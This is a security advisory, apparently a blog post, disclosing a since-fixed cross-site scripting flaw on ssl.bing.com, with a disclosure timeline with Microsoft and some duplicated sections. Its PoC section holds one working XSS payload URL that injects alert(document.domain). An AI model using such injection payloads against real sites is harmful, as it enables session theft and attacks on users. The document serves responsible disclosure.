SSCHADV2013-012 - ssl.bing.com - Cross-site Scripting vulnerability
Advisory:
|
ssl.bing.com – Cross-site Scripting vulnerability
|
Advisory ID:
|
SSCHADV2013-012
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on ssl.bing.com
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
The website ‘ssl.bing.com’ is prone to a Cross-site Scripting vulnerability
======================
PoC-Exploit
======================
PoC-Exploit
======================
https://ssl.bing.com/webmaster/home/mysites?orde=1&url=http%3A%2F%2Fstefanschurtz.de%2Ff5018%27-alert%28document.domain%29-%27207aac89df6
|
======================
Disclosure Timeline
======================
29-Dec-2013 – informed Microsoft Security Response Center
30-Dec-2013 – feedback from Microsoft Security Response Center
31-Dec-2013 – status update from Microsoft Security Response Center
03-Jan-2014 – status update from Microsoft Security Response Center
24-Jan-2014 – informed from MSRC about fix
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.microsoft.com
http://www.darksecurity.de/advisories/2013/SSCHADV2013-012.txt
Disclosure Timeline
======================
29-Dec-2013 – informed Microsoft Security Response Center
30-Dec-2013 – feedback from Microsoft Security Response Center
31-Dec-2013 – status update from Microsoft Security Response Center
03-Jan-2014 – status update from Microsoft Security Response Center
24-Jan-2014 – informed from MSRC about fix
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.microsoft.com
http://www.darksecurity.de/advisories/2013/SSCHADV2013-012.txt
Trackbacks
Anonymous on : [Video] - ssl.bing.com - Cross-site Scripting vulnerability
Show preview
Short video for my advisory SSCHADV2013-012 – ssl.bing.com – Cross-site Scripting vulnerability :-) Â Â
Comments
Display comments as Linear | Threaded